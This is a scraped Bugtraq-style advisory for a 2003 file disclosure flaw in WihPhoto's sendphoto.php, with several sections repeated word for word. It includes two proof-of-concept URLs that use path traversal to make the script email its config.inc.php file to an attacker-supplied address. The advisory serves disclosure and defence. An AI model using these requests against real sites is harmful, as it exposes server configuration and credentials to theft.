WihPhoto sendphoto.php File Disclosure Vulnerability
BID:6929
Info
WihPhoto sendphoto.php File Disclosure Vulnerability
| Bugtraq ID: | 6929 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Feb 24 2003 12:00AM |
| Updated: | Feb 24 2003 12:00AM |
| Credit: | Discovery of this vulnerability is credited to "Frog Man" <[email protected]>. |
| Vulnerable: |
WihPhoto WihPhoto 0.86 -dev |
| Not Vulnerable: | |
Discussion
WihPhoto sendphoto.php File Disclosure Vulnerability
A vulnerability has been reported for WihPhoto that may result in the disclosure of files to remote attackers.
The vulnerability exists due to inadequate verification of some URI parameters in the sendphoto.php script file.
An attacker can exploit this vulnerability and specify arbitrary files as the parameters to the variables. This will cause WihPhoto to send an email with the attacker-specified file as an attachment.
A vulnerability has been reported for WihPhoto that may result in the disclosure of files to remote attackers.
The vulnerability exists due to inadequate verification of some URI parameters in the sendphoto.php script file.
An attacker can exploit this vulnerability and specify arbitrary files as the parameters to the variables. This will cause WihPhoto to send an email with the attacker-specified file as an attachment.
Exploit / POC
WihPhoto sendphoto.php File Disclosure Vulnerability
The following proof of concepts were provided:
http://www.example.org/sendphoto.php?album=..&pic=config.inc.php
http://www.example.org/sendphoto.php?album=..&pic=config.inc.php&sendto=[E-MAIL]&filled=1
The following proof of concepts were provided:
http://www.example.org/sendphoto.php?album=..&pic=config.inc.php
http://www.example.org/sendphoto.php?album=..&pic=config.inc.php&sendto=[E-MAIL]&filled=1
Solution / Fix
WihPhoto sendphoto.php File Disclosure Vulnerability
Solution:
An unofficial patch is available on http://www.phpsecure.info.
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Solution:
An unofficial patch is available on http://www.phpsecure.info.
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
References
WihPhoto sendphoto.php File Disclosure Vulnerability
References:
References:
- WihPhoto Home Page (WihPhoto)
- WihPhoto (PHP) ("Frog Man"
)